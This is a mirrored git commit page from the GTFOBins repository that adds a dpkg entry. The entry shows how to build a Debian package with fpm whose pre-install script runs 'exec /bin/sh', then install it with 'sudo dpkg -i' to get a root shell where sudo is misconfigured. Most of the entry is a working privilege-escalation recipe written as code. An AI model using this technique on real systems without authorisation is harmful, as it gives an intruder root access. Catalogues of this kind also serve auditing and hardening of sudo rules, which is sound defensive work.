mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 06:49:44 +01:00
Add dpkg thanks to https://lsdsecurity.com/2019/01/linux-privilege-escalation-using-apt-get-apt-dpkg-to-abuse-sudo-nopasswd-misconfiguration/ as in #51
This commit is contained in:
parent
3166a321c0
commit
7a3ae6e05a
12
_gtfobins/dpkg.md
Normal file
12
_gtfobins/dpkg.md
Normal file
@ -0,0 +1,12 @@
|
|||||||
|
---
|
||||||
|
functions:
|
||||||
|
sudo:
|
||||||
|
- description: |
|
||||||
|
It runs an interactive shell using a specially crafted Debian package. Generate it with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.
|
||||||
|
```
|
||||||
|
TF=$(mktemp -d)
|
||||||
|
echo 'exec /bin/sh' > $TF/x.sh
|
||||||
|
fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF
|
||||||
|
```
|
||||||
|
code: sudo dpkg -i x_1.0_all.deb
|
||||||
|
---
|
Loading…
Reference in New Issue
Block a user